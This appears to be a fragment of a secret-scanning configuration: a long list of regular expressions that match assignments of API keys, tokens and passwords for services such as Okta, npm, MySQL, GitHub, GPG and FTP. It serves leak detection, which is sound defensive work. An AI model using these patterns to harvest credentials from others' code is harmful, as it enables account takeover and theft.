"(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nexuspassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nativeevents[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kubeconfig[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 